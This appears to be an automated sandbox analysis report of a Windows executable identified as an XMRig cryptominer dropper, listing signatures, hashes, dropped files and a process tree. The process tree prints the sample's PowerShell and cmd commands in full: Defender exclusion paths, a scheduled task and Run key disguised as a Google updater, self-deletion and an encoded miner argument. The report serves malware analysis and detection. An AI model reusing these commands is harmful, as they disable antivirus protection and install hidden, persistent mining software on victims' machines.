Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1799s
  • max time network
    1788s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3524
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1084
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3136
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1132
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3120
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:2340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:1540
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
            PID:1564
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:936
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:428
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          1⤵
            PID:4252
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2768
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:2724
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:3744

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            375KB

            MD5

            a395300f29528db1298b5dd43854c208

            SHA1

            2f30f385d489f160ac05d1a47e8c594fc2fa8939

            SHA256

            731b37014c1224c8259ab962033ac4024f47264fefe40f1e490106a34686cb33

            SHA512

            56348ef2e6d6fe1989b49d6f3a52151d87225f7a1adfa5bb89237cf477aef99b26ac89c83a4ba21610ad0a0b4150bfd549fb6da2f2e2f85c3626d00c093e96e3

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            13KB

            MD5

            f52d3ec307308cc70de97a5076d841e7

            SHA1

            3b2a6a5aa93a25e77a8e99c3d2300c50d546ba7c

            SHA256

            08b36471bbcee25efe87868c15448ec1659453fee43a5e8c1c904e7d96799e5e

            SHA512

            e15b46220f26796b9d9d857e7ad07cbe81f5867d6c2732beb3a894d44e2ca9f32bd1f321e66ddbf9bab129936869832bc80aa28018a1f69c1e0cd00c0a42fc36

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            d28a889fd956d5cb3accfbaf1143eb6f

            SHA1

            157ba54b365341f8ff06707d996b3635da8446f7

            SHA256

            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

            SHA512

            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e8e3af4111b4dbc5678a7a1374968c03

            SHA1

            80bc9516932accbef00602356fbca65a9bb2879c

            SHA256

            67946f37b2a5c6588b7b133996d7c00646e9ef8d01ffe2d34c7cd5627613aa5a

            SHA512

            853b8c30b544a7ceb84cae119883af3cf75880a3d21ec0fb5ff16464a202ea167b96fad6a62137906ad31b5b9ad4445cb083d45ea6d0f2f2127222ca389b2ebf

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ld4cc3s0.d5y.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/428-133-0x00007FF7F5570000-0x00007FF7F5586000-memory.dmp
            Filesize

            88KB

          • memory/428-126-0x00007FF7F5570000-0x00007FF7F5586000-memory.dmp
            Filesize

            88KB

          • memory/1084-16-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/1084-12-0x00000233596B0000-0x00000233596C0000-memory.dmp
            Filesize

            64KB

          • memory/1084-13-0x00000233596B0000-0x00000233596C0000-memory.dmp
            Filesize

            64KB

          • memory/1084-10-0x0000023373CD0000-0x0000023373CF2000-memory.dmp
            Filesize

            136KB

          • memory/1084-11-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/1132-48-0x0000016AB73E0000-0x0000016AB73F0000-memory.dmp
            Filesize

            64KB

          • memory/1132-49-0x0000016AB73E0000-0x0000016AB73F0000-memory.dmp
            Filesize

            64KB

          • memory/1132-47-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/1132-52-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/1540-115-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/1540-112-0x000001AD602E0000-0x000001AD602F0000-memory.dmp
            Filesize

            64KB

          • memory/1540-113-0x000001AD602E0000-0x000001AD602F0000-memory.dmp
            Filesize

            64KB

          • memory/1540-100-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/1540-102-0x000001AD602E0000-0x000001AD602F0000-memory.dmp
            Filesize

            64KB

          • memory/1540-101-0x000001AD602E0000-0x000001AD602F0000-memory.dmp
            Filesize

            64KB

          • memory/1564-146-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-158-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-188-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-186-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-184-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-182-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-180-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-178-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-176-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-174-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-172-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-170-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-168-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-166-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-164-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-162-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-160-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-156-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-154-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-120-0x000001F001D90000-0x000001F001DB0000-memory.dmp
            Filesize

            128KB

          • memory/1564-152-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-150-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-148-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-119-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-144-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-125-0x000001F002460000-0x000001F002480000-memory.dmp
            Filesize

            128KB

          • memory/1564-127-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-142-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-129-0x000001F0024A0000-0x000001F0024C0000-memory.dmp
            Filesize

            128KB

          • memory/1564-128-0x000001F002480000-0x000001F0024A0000-memory.dmp
            Filesize

            128KB

          • memory/1564-131-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-132-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-140-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-134-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-135-0x000001F002480000-0x000001F0024A0000-memory.dmp
            Filesize

            128KB

          • memory/1564-137-0x00007FF78C2A0000-0x00007FF78CA94000-memory.dmp
            Filesize

            8.0MB

          • memory/1564-138-0x000001F0024A0000-0x000001F0024C0000-memory.dmp
            Filesize

            128KB

          • memory/2000-0-0x00007FF6E5060000-0x00007FF6E5271000-memory.dmp
            Filesize

            2.1MB

          • memory/2000-36-0x00007FF6E5060000-0x00007FF6E5271000-memory.dmp
            Filesize

            2.1MB

          • memory/2340-78-0x000001F6E8BE0000-0x000001F6E8BEA000-memory.dmp
            Filesize

            40KB

          • memory/2340-64-0x000001F6E6810000-0x000001F6E6820000-memory.dmp
            Filesize

            64KB

          • memory/2340-85-0x000001F6E6810000-0x000001F6E6820000-memory.dmp
            Filesize

            64KB

          • memory/2340-84-0x000001F6E8E60000-0x000001F6E8E6A000-memory.dmp
            Filesize

            40KB

          • memory/2340-74-0x000001F6E8BF0000-0x000001F6E8C0C000-memory.dmp
            Filesize

            112KB

          • memory/2340-79-0x000001F6E8E30000-0x000001F6E8E4C000-memory.dmp
            Filesize

            112KB

          • memory/2340-80-0x000001F6E8E10000-0x000001F6E8E1A000-memory.dmp
            Filesize

            40KB

          • memory/2340-76-0x000001F6E6810000-0x000001F6E6820000-memory.dmp
            Filesize

            64KB

          • memory/2340-81-0x000001F6E8E70000-0x000001F6E8E8A000-memory.dmp
            Filesize

            104KB

          • memory/2340-83-0x000001F6E8E50000-0x000001F6E8E56000-memory.dmp
            Filesize

            24KB

          • memory/2340-88-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/2340-75-0x00007FF4B25F0000-0x00007FF4B2600000-memory.dmp
            Filesize

            64KB

          • memory/2340-82-0x000001F6E8E20000-0x000001F6E8E28000-memory.dmp
            Filesize

            32KB

          • memory/2340-63-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/2340-77-0x000001F6E8C10000-0x000001F6E8CC5000-memory.dmp
            Filesize

            724KB

          • memory/2768-121-0x00007FF648660000-0x00007FF648871000-memory.dmp
            Filesize

            2.1MB

          • memory/2768-53-0x00007FF648660000-0x00007FF648871000-memory.dmp
            Filesize

            2.1MB

          • memory/3136-34-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/3136-28-0x00007FFCB42E0000-0x00007FFCB4DA1000-memory.dmp
            Filesize

            10.8MB

          • memory/3136-30-0x000001D4ECBF0000-0x000001D4ECC00000-memory.dmp
            Filesize

            64KB

          • memory/3136-29-0x000001D4ECBF0000-0x000001D4ECC00000-memory.dmp
            Filesize

            64KB

          • memory/3136-32-0x000001D4ECBF0000-0x000001D4ECC00000-memory.dmp
            Filesize

            64KB

          • memory/3136-31-0x000001D4ECBF0000-0x000001D4ECC00000-memory.dmp
            Filesize

            64KB